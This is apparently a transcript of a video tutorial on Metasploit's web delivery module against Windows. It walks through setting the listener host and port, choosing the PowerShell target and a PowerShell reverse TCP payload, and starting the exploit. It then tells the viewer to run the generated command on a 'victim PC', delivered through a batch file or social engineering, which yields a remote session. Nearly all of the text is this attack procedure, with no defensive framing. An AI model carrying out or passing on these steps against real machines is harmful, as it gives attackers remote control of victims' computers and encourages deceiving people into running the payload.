Welcome. In this video, we are going to learn how to use Metasploit's web delivery exploit to create a script to connect to Unix, Linux or OS X machine using Python. Web delivery exploit will work on Windows systems that have Python installed. Few Windows systems actually have Python installed, while nearly every Unix, Linux and OS X has Python installed by default. Let's open up a terminal and start Metasploit. Type msf console. Let's load the web delivery exploit. Using Metasploit's web delivery is very similar to web delivery on Unix, Linux and OS X system, except that Windows system don't have Python installed by default. Type use exploit /multi script web delivery. We need to set the L host and L port exactly like we did with Linux X web delivery exploit. Type set L host 192.168.0.14. Type L port 444. We need to set URL path. I set it here to Powersploit. Set the target to PowerShell. The web delivery exploit in Metasploit uses Python script. To use Windows-based PowerShell option, we need to set the target to 2. Type set target 2. With the target set to 2, Metasploit will create a PowerShell script. When we are ready to exploit, we need to set the payload. Let's use Windows /PowerShell reverse TCP payload. Now we can type exploit and Metasploit will start a small web server in the background and generate a command for us to use on the Windows system. Copy the command and run this command in victim PC. You can send this command by using batch file or send this using social engineering technique. Here you can see that we get the sessions. So that's it in this video on Powersploit web delivery for Windows in Metasploit. Thank you for watching this video.